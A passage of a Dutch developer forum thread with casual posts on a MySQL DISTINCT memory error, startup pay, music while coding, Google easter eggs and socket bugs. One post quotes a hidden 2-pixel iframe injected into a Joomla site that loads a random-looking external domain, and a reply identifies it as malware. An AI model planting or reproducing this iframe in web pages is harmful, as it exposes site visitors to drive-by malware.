De Devschuur Coffee Corner - Iteratie 2 Vorige deel Overzicht Volgende deel Laatste deel

Dit topic is onderdeel van een reeks. Ga naar het meest recente topic in deze reeks.

Pagina: 1 ... 15 ... 267 Laatste
Acties:
  • 997.316 views

Acties:
  • 0 Henk 'm!

• st0p
  • Registratie: April 2004
  • Laatst online: 19-07-2024
Tja het hangt er ook vanaf hoe weinig heel weinig is. Ik woon niet meer thuis, ben vrijgezel dus heb ook geen partner met inkomsten. Hoe goed het concept ook moge zijn, ik moet wel de huur kunnen blijven betalen. Het hangt er denk ook vanaf wie dan de andere personen zijn. Met sommige mensen zou ik zelfs voor een extreem goed salaris niet meer willen werken.

Acties:
  • 0 Henk 'm!

• BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

st0p schreef op woensdag 02 november 2011 @ 12:55:
Met sommige mensen zou ik zelfs voor een extreem goed salaris niet meer willen werken.
:P _O-

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

Acties:
  • 0 Henk 'm!

• Phoenix1337
  • Registratie: April 2009
  • Laatst online: 18-09 21:41
.Gertjan. schreef op woensdag 02 november 2011 @ 12:51:
:'( Ben er nu achter waarom MySQL loopt te buggen met Mantis :'(

Mantis doet een count (distinct column) en dat kost op de een of andere manier te veel geheugen. Hij wil dan 1 MB alloceren (wauw, 1 MB omgzzz) en dat krijgt hij niet van mijn hosting partij. De ene keer werkt de query goed en dan doet hij het weer een paar uur niet. Zowel in PHP/Mantis gaat het mis, maar ook als ik de query rechtstreeks op de SQL uitvoer...

SQL:
1
SELECT Count(distinct mantis_bug_table.id ) as idcnt FROM mantis_project_table, mantis_bug_table WHERE mantis_project_table.id = mantis_bug_table.project_id AND ( mantis_bug_table.project_id = 1 ) AND ( mantis_bug_table.handler_id=2 )

Gaat mis met een out of memory melding -O-
SQL:
1
SELECT Count(mantis_bug_table.id ) as idcnt FROM mantis_project_table, mantis_bug_table WHERE mantis_project_table.id = mantis_bug_table.project_id AND ( mantis_bug_table.project_id = 1 ) AND ( mantis_bug_table.handler_id=2 )

Gaat goed :/
Nou dan gaan we Mantis maar "hacken". Het schijnt een bekend probleem te zijn, maar het is nooit opgelost :(

Mmm, nu ik dit zo type doet mijn omgeving het weer. Maar denk dat ik toch even ga kijken of ik Mantis kan aanpassen, want dit is best irritant zo... Kan goed over 10 minuten weer mis gaan :/
Lekker ranzige join ook

Acties:
  • 0 Henk 'm!

• .Gertjan.
  • Registratie: September 2006
  • Laatst online: 17-02 21:20

.Gertjan.

Owl!

Gelukkig niet mijn code. Ik heb de distinct eruit gesloopt en meteen weer gesloten :+ De SQL query wordt doodleuk opgebouwd door een SELECT stringetje op te bouwen :F

Vraag me ook af waarom je een distinct wil doen... Een issue hangt maar aan 1 project dus hij kan ook maar 1x terugkomen :S Maar goed, sommige developers strooien graag met distinct. Heb ontwikkelaars meegemaakt die geen select meer konden typen zonder er een distinct achter te smijten :F

> Tja ik krijg soms dubbele data terug
< Misschien tijd om eens goed naar je query te kijken dan
> Waarom? Een distinct werkt toch gewoon...
:'(
Zover ik weet is een distinct een vrij zware operatie omdat hij ieder item op uniekheid moet checken. Daarbij komt dat je bij een verrotte query in eerste instantie teveel data ophaalt om het er later weer uit te gooien.. Lekker efficiënt...

The #1 programmer excuse for legitimately slacking off: "My code's compiling"
Firesphere: Sommige mensen verdienen gewoon een High Five. In the Face. With a chair.

Acties:
  • 0 Henk 'm!

• Remus
  • Registratie: Juli 2000
  • Laatst online: 15-08-2021
.Gertjan. schreef op woensdag 02 november 2011 @ 12:51:
:'( Ben er nu achter waarom MySQL loopt te buggen met Mantis :'(

Mantis doet een count (distinct column) en dat kost op de een of andere manier te veel geheugen. Hij wil dan 1 MB alloceren (wauw, 1 MB omgzzz) en dat krijgt hij niet van mijn hosting partij.
Default MySQL instellingen uit het jaar nul?

Acties:
  • 0 Henk 'm!

• .Gertjan.

.Gertjan.

Owl!

Remus schreef op woensdag 02 november 2011 @ 13:26:
[...]

Default MySQL instellingen uit het jaar nul?
Dunno, niet mijn MySQL (lol, dat klinkt raar). Is een shared hosting club, maar het lijkt me niet dat ik maar 1MB mag gebruiken. De fout treedt ook niet constant op, zo af en toe duikt hij op en dan is hij hardnekkig. Ze hebben er al eens naar gekeken, maar vonden geen oplossing. Er zijn ook queries die groter zijn maar geen problemen opleveren. Sowieso is voor een simpele count 1MB geheugen wel veel, er zitten 2 projecten met in het totaal 50 issues in het systeem :?

Op internet werd ik niet veel wijzer. Op de Mantis fora wordt er niet veel over gesproken, op MySQL fora wel, daar wordt er gemeld dat het te maken heeft met buggy adres allocatie. Ik las zelfs ergens dat het kan optreden als je meer dan 4GB beschikbaar hebt op een 32bit versie van MySQL.

Ik denk het nu opgelost te hebben door de distinct te slopen, de app ging ook niet helemaal gestrekt, ik kon bijvoorbeeld nog wel issues aanmaken of direct een issue openen. Het zat hem dus puur in de count van de overzichtsschermen. Nou ja, lekker laten doen, kan mijn tijd beter besteden dan vage bugs te tracen :P

Firesphere: Sommige mensen verdienen gewoon een High Five. In the Face. With a chair.

Acties:
  • 0 Henk 'm!

• Phoenix1337

Acties:
  • 0 Henk 'm!

• Snake
  • Registratie: Juli 2005
  • Laatst online: 07-03-2024

Snake

Los Angeles, CA, USA

Leuk toch :+ En dat is het land waar ik wil gaan wonen *O*

Going for adventure, lots of sun and a convertible! | GMT-8

Acties:
  • 0 Henk 'm!

• .Gertjan.

.Gertjan.

Owl!

Bloody Hell...

Seriously WTF.... WHY????? :/

Wel bizar dat ik klik en er verbaasd van sta geen plaatjes te zien en vervolgens alsnog de link met het plaatje open en denk, dit wilde ik eigenlijk niet zien :S

Acties:
  • 0 Henk 'm!

• YopY
  • Registratie: September 2003
  • Laatst online: 13-07 01:14
.Gertjan. schreef op woensdag 02 november 2011 @ 14:31:
Wel bizar dat ik klik en er verbaasd van sta geen plaatjes te zien en vervolgens alsnog de link met het plaatje open en denk, dit wilde ik eigenlijk niet zien :S
Welkom op het internet! :+

@link, geil. :p Bear Grylls deed het eerder. Niet naakt voor zover ik weet, maar scheelt niet veel.

Acties:
  • 0 Henk 'm!

• .Gertjan.

.Gertjan.

Owl!

Nou veel valt er niet meer te verzieken. Daar heeft 4chan al voor gezorgd... :/
@link, geil. :p Bear Grylls deed het eerder. Niet naakt voor zover ik weet, maar scheelt niet veel.
Geil? Ieder zijn fetisj zullen we maar zeggen. :Y)

Acties:
  • 0 Henk 'm!

• Phoenix1337
Er is helaas niet veel naakt te zien. Om dat paard moeten we maar even heen kijken :p

Acties:
  • 0 Henk 'm!

Verwijderd

Bezig met een stream van data van twitter te storen in een database en deze vervolgens uit te lezen met php, maar webhost wil niet mee werken en cronjob lijkt me overbodig, hoef het niet elke minuut te runnen namelijk, maar gewoon 1 keer, en dan moet ie gewoon de stream openhouden, maar ja, zonder cli geen stream in background he >.>

Acties:
  • 0 Henk 'm!

• Phoenix1337
Start je hem via een cronjob. Heeft hetzelfde effect.

Acties:
  • 0 Henk 'm!

Verwijderd

Maar dan wordt ie toch elke x tijd gestart?

[ Voor 9% gewijzigd door Verwijderd op 02-11-2011 15:11 ]

Acties:
  • 0 Henk 'm!

• creator1988
  • Registratie: Januari 2007
  • Laatst online: 09:05
BtM909 schreef op woensdag 02 november 2011 @ 11:59:
[mbr]Dit is geen WERVING, maar een vraag (of dillema ;))[/]

Kort door de bocht: Zijn er hier devvers / consultants / ITers die gratis of voor heel weinig zouden willen werken met mogelijk een hele grote business case?

Wat langer door de bocht: stel dat je wordt gevraagd bij een startup waarbij je later wordt gecompenseerd als het bedrijf omzet gaat draaien. In het begin levert het weinig tot niks op, dus je moet zelf ook actiever gaan kijken of het wel een valide business plan is. Heeft het kans van slagen (bijvoorbeeld omdat het een gat in de markt is), heb je genoeg vertrouwen in de executie van de founder, hoe ziet het financieel plaatje er uit, etc. etc.

Hoe staan jullie hier tegenover? Of kiezen jullie liever voor het "veilige" werknemerschap?
Depends heel erg. Als het echt een goed idee is dan moet funding niet heel moeilijk zijn dus dan betalen ze me maar. Het prototypen van ideeen wil ik best nog wel doen maar dan ook max. 2 weken en doe ik ook alleen voor een aantal mensen in wie ik wel vertrouwen heb.

Acties:
  • 0 Henk 'm!

• Remus
  • Registratie: Juli 2000
  • Laatst online: 15-08-2021
.Gertjan. schreef op woensdag 02 november 2011 @ 13:32:
[...]

Dunno, niet mijn MySQL (lol, dat klinkt raar). Is een shared hosting club, maar het lijkt me niet dat ik maar 1MB mag gebruiken. De fout treedt ook niet constant op, zo af en toe duikt hij op en dan is hij hardnekkig. Ze hebben er al eens naar gekeken, maar vonden geen oplossing. Er zijn ook queries die groter zijn maar geen problemen opleveren. Sowieso is voor een simpele count 1MB geheugen wel veel, er zitten 2 projecten met in het totaal 50 issues in het systeem :?
Ik gebruik MySQL bijna nooit, maar ik meen dat de standaard my.cnf (zeker bij wat oudere versies) nogal conservatief is in de geheugen-instellingen mbt sort space en andere buffers.

Acties:
  • 0 Henk 'm!

• Phoenix1337
Verwijderd schreef op woensdag 02 november 2011 @ 15:10:
Maar dan wordt ie toch elke x tijd gestart?
True, had er even niet aan gedacht dat je geen jaar meegeeft. Je kan natuurlijk iets van een check inbouwen of het script nog draait en zoniet dan wordt hij via de cronjob weer gestart.

Acties:
  • 0 Henk 'm!

Verwijderd

Dag 5 van de vakantie tikt weg. Ik had me voorgenomen om in de vakantie wat statistiek en netwerken te herhalen, maar het komt er dus maar niet van ...

Motivering, waar zit je?

Acties:
  • 0 Henk 'm!

• Matis
  • Laatst online: 19:51

Matis

Rubber Rocket

Morgen een (gratis) workshop Cortex-M4 Processor met een gratis dev-kitje O+

* Matis zin in heeft!

If money talks then I'm a mime
If time is money then I'm out of time

Acties:
  • 0 Henk 'm!

• Styxxy
  • Registratie: Augustus 2009
  • Laatst online: 10:57
Afbeeldingslocatie: http://www.imgdumper.nl/uploads4/4eb17ee42325b/4eb17ee41f3e2-26938_10150156401890083_123159390082_12058425_1699824_n.jpg

d:)b d:)b d:)b

Acties:
  • 0 Henk 'm!

• Soultaker
  • Registratie: September 2000
  • Laatst online: 18:14
Pff, oud nieuws man. Stond ruim een maand geleden al op 4chan en Reddit. Hoewel mensen die dit al NSFL/NSFA vinden daar natuurlijk niet komen. (Dat geeft me wel te denken hoe ze dit url=weg soort dingenzouden kwalificeren, en dat is nog niet eens het ergste wat er online te vinden is.) Vraag me ook af of die mensen wel eens in een slachthuis zijn geweest, of dat ze allemaal principevegetariër zijn, als de lichamelijke integriteit van dode dieren ze zoveel kan schelen.

[ Voor 19% gewijzigd door Creepy op 02-11-2011 20:34 . Reden: URL gestripped. Ook hier absoluut niet wenselijk ]

Acties:
  • 0 Henk 'm!

Verwijderd

Kort door de bocht: Zijn er hier devvers / consultants / ITers die gratis of voor heel weinig zouden willen werken met mogelijk een hele grote business case?[..]
Interessante case. Ik denk dat het afhangt van een aantal factoren. Ben je bereid een risico te nemen, ben je bereid (tijdelijk) salaris in te leveren, kun je salaris inleveren? Of je bereid bent risico te nemen hangt ook veel van je huidige situatie af. Als je een baan hebt die goed bevalt met een leuk salaris zul je minder snel bereid zijn dan als je niet echt tevreden bent en/of het salaris niet fantastisch is.

Salaris inleveren is een kwestie van willen en een kwestie van kunnen. De meeste mensen verdienen meer dan ze strikt genomen nodig hebben (vaste lasten+boodschappen), maar ben je ook bereid om dat in te leveren en dus niet zomaar meer dvdtjes of games te kunnen kopen? Daarnaast moet het ook maar kunnen, als je een flinke hypotheek hebt, of een vrouw/kinderen die van je inkomen afhankelijk zijn wordt het ook een ander verhaal. In het laatste geval zul je waarschijnlijk ook minder bereid zijn risico te nemen.

Persoonlijk ben ik zonder meer bereid om een risico te nemen, maar ik heb niet de financiële mogelijkheid om het voor langere tijd zonder inkomen te stellen. Tijdelijk een beperkt salaris vind ik niet erg, maar ik moet wel ergens de huur en de boodschappen van kunnen betalen. Daar komt nog bij dat het voor mij persoonlijk dan wel de moeite waard moet zijn. Ik zou in het idee moeten geloven en het leuk vinden om er aan te werken. Maar dat spreekt eigenlijk wel voor zich denk ik. :)

Maar ik ben stiekem eigenlijk wel benieuwd of we het hier over puur een hypothetisch geval hebben of dat je concreet ergens aan denkt?

Acties:
  • 0 Henk 'm!

• BtM909
  • Niet online

BtM909

Watch out Guys...

Verwijderd schreef op woensdag 02 november 2011 @ 20:48:
Maar ik ben stiekem eigenlijk wel benieuwd of we het hier over puur een hypothetisch geval hebben of dat je concreet ergens aan denkt?
Wordt anders wel heel offtopic, voeg me maar toe op MSN, Skype of GTalk... Licht ik t daar wel toe

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)

Acties:
  • 0 Henk 'm!

• Ealanrian
  • Registratie: Februari 2009
  • Laatst online: 19:12

Hoe staan jullie hier tegenover? Of kiezen jullie liever voor het "veilige" werknemerschap?
Dit soort projecten zijn juist de projecten waar ik zelf graag aan mee werk. Ook een van de redenen om aan het honours program van mijn opleiding mee te doen, en als student is het ook wat makkelijker omdat de vaste lasten veel lager zijn.

nog een DMbox open voor toelichting :)

Acties:
  • 0 Henk 'm!

• Rhapsody
  • Registratie: Oktober 2002
  • Laatst online: 19:28

Rhapsody

In Metal We Trust

Ah, en mijn Unit test project kan mijn 'te testen project' weer eens niet vinden...

code:
1
Error   3   Could not load file or assembly 'ASSEMBLY_NAME, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.

wordt een lange dag zo...

🇪🇺 pro Europa! | Puinhoop Veroorzaken en Vertrekken (PVV)

Acties:
  • 0 Henk 'm!

• YopY
  • Registratie: September 2003
  • Laatst online: 13-07 01:14
Aan de ene kant: Jeuj, de rauwe performance van onze Scala push notification server is 600 binnenkomende requests per seconde afhandelen en 600 berichten / seconde weer versturen, *O*.

Aan de andere kant, dat is gebaseerd op een best-case scenario - geen of weinig lag bij de binnenkomende requests (ze worden vanaf de server zelf ingeschoten via een performance testje), geen lag vanuit de externe webservice die bij elk bericht aangeroepen moet worden, en geen daadwerkelijke Apple server waar de verstuurde berichten heen gestuurd worden -O-.

Wat betekent dat: Dat de performance en stabiliteit van de server niet helemaal in onze handen ligt, en dat we in de code om moeten gaan met netwerklag en vele openstaande requests enzo. Niet prettig, :'(.

Morgen en volgende week maar eens de communicatie met de externe webservice echt asynchroon maken :p. Code:

Scala:
1
val response = client.prepareGet(buildApiURL(trip)).setRealm(realm).execute().get

Uitleg: De prepareGet methode geeft een Builder terug. De execute() method geeft een Future terug, die ooit eens in de toekomst iets terug zal gaan geven - non-blocking dus.

De .get die daarop aangeroepen wordt haalt het resultaat op... maar is dus blocking zolang het resultaat niet beschikbaar is -O-. Ofwel: NIO: Doing it wrong. :p.

Acties:
  • 0 Henk 'm!

• Haan
  • Registratie: Februari 2004
  • Laatst online: 10:08

Haan

dotnetter

Rhapsody schreef op donderdag 03 november 2011 @ 11:41:
Ah, en mijn Unit test project kan mijn 'te testen project' weer eens niet vinden...

code:
1
Error   3   Could not load file or assembly 'ASSEMBLY_NAME, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.

wordt een lange dag zo...
Niet toevallig veroorzaakt doordat het te testen project niet wil builden? Dat wil bij mij wel eens de oorzaak van die foutmelding zijn.

Kater? Eerst water, de rest komt later

Acties:
  • 0 Henk 'm!

• Rhapsody
  • Laatst online: 19:28

Rhapsody

In Metal We Trust

Nee dat project compileert prima. Alle references compileren, dat maakt het zo vaag. Helaas is de foutmelding zodanig dat ik niet kan achterhalen welke file er niet gevonden wordt (het te testen project óf een van de dependencies....)

🇪🇺 pro Europa! | Puinhoop Veroorzaken en Vertrekken (PVV)

Acties:
  • 0 Henk 'm!

• Gamebuster
  • Registratie: Juli 2007
  • Laatst online: 15-09 23:08
*zet muziek op via speakersetje*
*5 van de 8 collega's zetten koptelefoon op*

Zet ik een keertje geen drum 'n bass op, is 't weer niet goed :P

[ Voor 35% gewijzigd door Gamebuster op 03-11-2011 13:00 ]

Let op: Mijn post bevat meningen, aannames of onwaarheden

Acties:
  • 0 Henk 'm!

• Ryur
  • Registratie: December 2007
  • Laatst online: 19:50
Gamebuster schreef op donderdag 03 november 2011 @ 13:00:
*zet muziek op via speakersetje*
*5 van de 8 collega's zetten koptelefoon op*

Zet ik een keertje geen drum 'n bass op, is 't weer niet goed :P
Wat heb jij nu dan opstaan?

Gelijk een leuke discussie: Muziek tijdens programmeren of niet? En zoja, wat voorn muziek hebben jullie dan aanstaan?

Acties:
  • 0 Henk 'm!

• Gamebuster

Ik heb _altijd_ muziek op staan tijdens programmeren. Meestal chiptune, drum 'n bass, happy hardcore en andere elektronische herrie varianten.

Acties:
  • 0 Henk 'm!

• Dragor
  • Registratie: Juni 2003
  • Laatst online: 08-02 11:04
GoTCoast schreef op donderdag 03 november 2011 @ 13:07:
[...]

Wat heb jij nu dan opstaan?

Gelijk een leuke discussie: Muziek tijdens programmeren of niet? En zoja, wat voorn muziek hebben jullie dan aanstaan?
Meestal wel, soms niet, ligt eraan wat ik aan het doen ben. Soms doen we pair programming en dan is een koptelefoon op niet zo netjes :P

En nu draai ik: Korn ft. Skrillex & Kill the Noise - Narcissistic Cannibal

Acties:
  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Skrillex - Kill Everybody!

Acties:
  • 0 Henk 'm!

• OkkE
  • Registratie: Oktober 2000
  • Laatst online: 04-09 08:16

OkkE

CSS influencer :+

Ik vind eigenlijk "First Of The Year Equinox" beter. :)

“The best way to get the right answer on the Internet is not to ask a question, it's to post the wrong answer.”
QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers.

Acties:
  • 0 Henk 'm!

• alienfruit
  • Registratie: Maart 2003
  • Laatst online: 14:07

alienfruit

the alien you never expected

Ja, ik luister nu naar Radio 1:)

Acties:
  • 0 Henk 'm!

• st0p
  • Laatst online: 19-07-2024
Veel drum'n'bass (ook heel veel oldskool jungle uit '92), of soul/funk/hiphop en heel soms radio 1.

Acties:
  • 0 Henk 'm!

• OkkE

OkkE

Ik luister over het algemeen naar triphop of minimal/techno, maar ook af en toe drum'n'bass en dubstep of bijv The Doors / David Bowie. :)

[ Voor 37% gewijzigd door OkkE op 03-11-2011 13:54 ]

“The best way to get the right answer on the Internet is not to ask a question, it's to post the wrong answer.”
QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers.

Acties:
  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Ik gebruik een tijdje Spotify, maar ik vind het niet zo leuk als Pandora. Pandora heeft suggesties, en dat mist Spotify nog...

Acties:
  • 0 Henk 'm!

• Dragor
  • Laatst online: 08-02 11:04
Snake schreef op donderdag 03 november 2011 @ 14:09:
Ik gebruik een tijdje Spotify, maar ik vind het niet zo leuk als Pandora. Pandora heeft suggesties, en dat mist Spotify nog...
Probeer eens http://www.spotibot.com of http://echofiapp.com/. Ze stellen beide muziek voor op basis van een artiest (volgensmij is het ook nog van dezelfde maker). Spotibot maakt er dan een playlist van en Echofi stuurt de liedjes 1 voor 1 naar spotify (nadeel is dat de browser open moet staan om dit mogelijk te maken).

Het is niet zo makkelijk als een ingebouwd iets en het houdt ook geen rekening met liedjes die in bepaalde landen niet af te spelen zijn, maar het werkt wel ;)

Acties:
  • 0 Henk 'm!

• Davio
  • Registratie: November 2007
  • Laatst online: 06-01 16:46
Wij hebben hier zo'n oud klusradio'tje van iemand, daar luister ik altijd radio 3 mee op een normaal niveau.

Dat komt vooral doordat ik de Ochtendshow van Giel en de Coen & Sander show wel grappig vind, voor de rest is het wel acceptabele en redelijk mainstream muziek, wat toch belangrijk is als je met een heleboel collega's in een grote ruimte zit, al staat hij zacht genoeg om niemand te storen.

Afbeeldingslocatie: http://28.media.tumblr.com/tumblr_laoz1y42mk1qap9wco1_500.jpg

"I was told that I could listen to the radio at a reasonable volume from nine to eleven, I told Bill that if Sandra is going to listen to her headphones while she’s filing then I should be able to listen to the radio while I’m collating so I don’t see why I should have to turn down the radio because I enjoy listening at a reasonable volume from nine to eleven."

Acties:
  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Van welke film is dat?

Nvm, Office Space.

[ Voor 128% gewijzigd door Snake op 03-11-2011 14:52 ]

Acties:
  • 0 Henk 'm!

• OkkE

OkkE

Damnit, waarom onderstund iPhone (mobile Safari) nu weer geen vCard / hCard... :(

Acties:
  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Omdat het Apple is. Hoe langer hoe meer loop ik tegen de limitaties aan van iOS. Tot op een bepaald niveau is controle goed, maar dit zijn dingen die gewoonweg niet meer geaccepteerd mogen worden...

Acties:
  • 0 Henk 'm!

• OkkE

OkkE

Snake schreef op donderdag 03 november 2011 @ 15:14:
Omdat het Apple is. Hoe langer hoe meer loop ik tegen de limitaties aan van iOS. Tot op een bepaald niveau is controle goed, maar dit zijn dingen die gewoonweg niet meer geaccepteerd mogen worden...
Irritant.

Het gekke vind ik, als ik een hCard in een html-file zet en deze online bezoek, kan ik alleen het adres kopieëren. Zet ik de zelfde file in Dropbox en open ik 'm met mijn iPhone, is het adres wel een link: Maak Contact of Open Maps.

Acties:
  • 0 Henk 'm!

• Phoenix1337
Wij luisteren over t algemeen naar 3FM maar ook wel hardstyle en hardcore :)

Acties:
  • 0 Henk 'm!

• Michali
  • Registratie: Juli 2002
  • Laatst online: 29-05 22:54
GoTCoast schreef op donderdag 03 november 2011 @ 13:07:
[...]

Ik luister altijd wel muziek tijdens programmeren. Kom ik lekker mee in de flow zeg maar. 8)

Vaak elektronica, techno en house achtig meestal, maar ook af en toe (post) rock.

Luister ook vaak m'n eigen mixen (zie m'n sig). :)

Noushka's Magnificent Dream | Unity

Acties:
  • 0 Henk 'm!

• marcop23
  • Registratie: December 2009
  • Laatst online: 18:11
Kut :(

HTML:
1
2
3
<div style="height:2px">
  <iframe src="http://lhjptpglncz.com/index.php?tp=001e4bb7b4d7333d" width="100" height="2"></iframe>
</div>

Standaard Joomla installatie...
Edit: Niet klikken dus...

[ Voor 6% gewijzigd door marcop23 op 03-11-2011 19:30 . Reden: Bedankt hieronder :) ]

Acties:
  • 0 Henk 'm!

• Aloys
  • Registratie: Juni 2005
  • Niet online
Misschien eventjes vermelden dat het malware is, voordat iedereen die link ff in z'n browser plakt om het te testen ;) .

Acties:
  • 0 Henk 'm!

• Ealanrian
  • Registratie: Februari 2009
  • Laatst online: 19:12
Staatsloterij heeft een newsletter fuckup. Weer de nieuwsbrief voor de 10-10 trekking. Ik zou graag 100000 euro willen winnen maar om daar tot volgend jaar mee te wachten is wat te lang

Acties:
  • 0 Henk 'm!

• Gamebuster
http://google.com/

typ "do a " (zonder quotes, maar mét die spatie)

Acties:
  • 0 Henk 'm!

• Matis

Matis

Rubber Rocket

barrel roll...

Acties:
  • 0 Henk 'm!

Verwijderd

hoe is 't mogelijk.

Acties:
  • 0 Henk 'm!

• Avalaxy
  • Registratie: Juni 2006
  • Laatst online: 16:44
Gamebuster schreef op vrijdag 04 november 2011 @ 00:18:

lol :D

Acties:
  • 0 Henk 'm!

• Aloys
  • Registratie: Juni 2005
  • Niet online
Die developers van Google hebben tenminste humor (of de leidinggevende checkt niet of ze wel doorwerken aan zinnige dingen) :+ .

edit: Regelmatig dit soort grapjes onderscheid Google toch echt wel van andere zoekmachines (hoewel ik het zoeken ook gewoon beter vind).

[ Voor 35% gewijzigd door Aloys op 04-11-2011 00:49 ]

Acties:
  • 0 Henk 'm!

• Devilly
  • Registratie: Januari 2009
  • Niet online

:D

Deze kwam ik vanochtend tegen en vind ik ook wel het delen waard: http://userlook.com/about/.

Acties:
  • 0 Henk 'm!

• Jegorex
  • Laatst online: 03-09 23:24
Aloys schreef op vrijdag 04 november 2011 @ 00:48:
Die developers van Google hebben tenminste humor (of de leidinggevende checkt niet of ze wel doorwerken aan zinnige dingen) :+ .

edit: Regelmatig dit soort grapjes onderscheid Google toch echt wel van andere zoekmachines (hoewel ik het zoeken ook gewoon beter vind).
Volgens mij mogen mensen die bij Google werken 20% van hun tijd aan eigen projecten besteden.
Dan krijg je dit soort geinige dingen :D

Acties:
  • 0 Henk 'm!

• Matis

Matis

Rubber Rocket

Doet het ook al niet op FF onder Ubuntu ;(

Acties:
  • 0 Henk 'm!

• Caelorum
  • Registratie: April 2005
  • Laatst online: 19:36
Devilly schreef op vrijdag 04 november 2011 @ 00:49:
[...]Deze kwam ik vanochtend tegen en vind ik ook wel het delen waard: http://userlook.com/about/.
Die gezichten ook als je de cursor op de kaas laat staan ^^

Acties:
  • 0 Henk 'm!

• Neverwinterx
  • Registratie: December 2005
  • Laatst online: 12-09 10:56
Aloys schreef op vrijdag 04 november 2011 @ 00:48:

Dat hoeft toch niet per se een grapje van google te zijn? Misschien zoeken mensen daar gewoon veel op :p

Acties:
  • 0 Henk 'm!

• Alex)
  • Laatst online: 21-08 11:20
Do a barrel roll _O-

We are shaping the future

Acties:
  • 0 Henk 'm!

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

Mensen die sockets niet begrijpen. En die niet begrijpen waarom protocollen hoger dan TCP zijn verzonnen en hun eigen misbaksels implementeren. :N

Kwam nu weer wat tegen waarbij na het verzenden van een bericht een sleep van een seconde werd uitgevoerd "om de buffer bij de client te legen zodat het QUIT-commando gelezen kan worden". Ja, want de data die je uit Socket.Receive krijgt parsen is natuurlijk te moeilijk, en het is in theorie natuurlijk ook absoluut onmogelijk dat er toch gewoon "... restje data ... QUI" wordt gestuurd, en als laatste pakketje een "T".

Of toch wel? Ja, en daar ging de applicatie.

https://oneerlijkewoz.nl
Op papier is hij aan het tekenen, maar in de praktijk...

Acties:
  • 0 Henk 'm!

• EddoH
  • Registratie: Maart 2009
  • Niet online

EddoH

Backpfeifengesicht

CodeCaster schreef op vrijdag 04 november 2011 @ 09:59:
Mensen die sockets niet begrijpen. En die niet begrijpen waarom protocollen hoger dan TCP zijn verzonnen en hun eigen misbaksels implementeren. :N

Kwam nu weer wat tegen waarbij na het verzenden van een bericht een sleep van een seconde werd uitgevoerd "om de buffer bij de client te legen zodat het QUIT-commando gelezen kan worden". Ja, want de data die je uit Socket.Receive krijgt parsen is natuurlijk te moeilijk, en het is in theorie natuurlijk ook absoluut onmogelijk dat er toch gewoon "... restje data ... QUI" wordt gestuurd, en als laatste pakketje een "T".

Of toch wel? Ja, en daar ging de applicatie.
Ik vind het bijna moeilijk te geloven dat dat in de profesionele sw wereld voorkomt. Zulke fouten zou je een paar keer tijdens een opleiding/stage whatever kunnen maken maar als je zo software ontwerpt kun je jezelf toch geen programmeur noemen? :)

Acties:
  • 0 Henk 'm!

• RayNbow
  • Registratie: Maart 2003
  • Laatst online: 19:53

RayNbow

Kirika <3

Werkt alleen als je Google Instant aan hebt staan, anders moet je zoeken op do a barrel roll.

Ipsa Scientia Potestas Est
NNID: ShinNoNoir

Acties:
  • 0 Henk 'm!

• Neverwinterx
  • Registratie: December 2005
  • Laatst online: 12-09 10:56
RayNbow schreef op vrijdag 04 november 2011 @ 10:17:
[...]

Werkt alleen als je Google Instant aan hebt staan, anders moet je zoeken op do a barrel roll.
Aha dat verklaart, leuk :)

Acties:
  • 0 Henk 'm!

• Alex)
Ik faal.

XSS-leak in de (interne) applicatie waar ik aan werk :')

[ Voor 47% gewijzigd door Alex) op 04-11-2011 10:26 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Net me vmware linux server gecrashed door een foutje in me php code, oneindige loop die nog meer oneindige loops runt. Oneindigheid^Oneindigheid!haha, vond de vm niet zo leuk.

[ Voor 8% gewijzigd door Verwijderd op 04-11-2011 12:09 ]

Acties:
  • 0 Henk 'm!

• EddoH
  • Niet online

EddoH

Backpfeifengesicht

Verwijderd schreef op vrijdag 04 november 2011 @ 12:08:
Net me vmware linux server gecrashed door een foutje in me php code, oneindige loop die nog meer oneindige loops runt. Oneindigheid^Oneindigheid!haha, vond de vm niet zo leuk.
....wat is er mis met oneindige loops?

Acties:
  • 0 Henk 'm!

Verwijderd

EddoH schreef op vrijdag 04 november 2011 @ 12:11:
[...]

....wat is er mis met oneindige loops?
oneindige loops, die nog meer oneindige loops starten. Kost je flink wat rekenkracht om dit vol te houden, en daar red je het niet mee met de vm die ik draai.

Acties:
  • 0 Henk 'm!

• Gamebuster
Alex) schreef op vrijdag 04 november 2011 @ 10:26:
Ik faal.

XSS-leak in de (interne) applicatie waar ik aan werk :')
1tje maar? :P

Acties:
  • 0 Henk 'm!

• Alex)
Nee, meerdere. Heb ze nu verholpen.

En nu CSRF-protection aan het inbouwen.

Acties:
  • 0 Henk 'm!

• Rutix
  • Registratie: Augustus 2009
  • Laatst online: 05-09-2024
Alex) schreef op vrijdag 04 november 2011 @ 12:35:
Nee, meerdere. Heb ze nu verholpen.

En nu CSRF-protection aan het inbouwen.
Zo erg faal je niet hoor :). Je bent er teminste achter gekomen :P beter dan mensen die het erin hebben zitten en waar het word misbruikt :D

Nothing to see here!

Acties:
  • 0 Henk 'm!

• ZaZ
  • Laatst online: 19-08 14:24

ZaZ

Tweakers abonnee

Verwijderd schreef op vrijdag 04 november 2011 @ 12:15:
[...]

oneindige loops, die nog meer oneindige loops starten. Kost je flink wat rekenkracht om dit vol te houden, en daar red je het niet mee met de vm die ik draai.
Dan loopt als het goed is alleen de applicatie vol en crasht uiteindelijk omdat ie geen geheugen meer krijgt of out of stack space is oid.
Je zou daarmee nooit je OS op z'n knieen moeten kunnen krijgen.

Lekker op de bank

Acties:
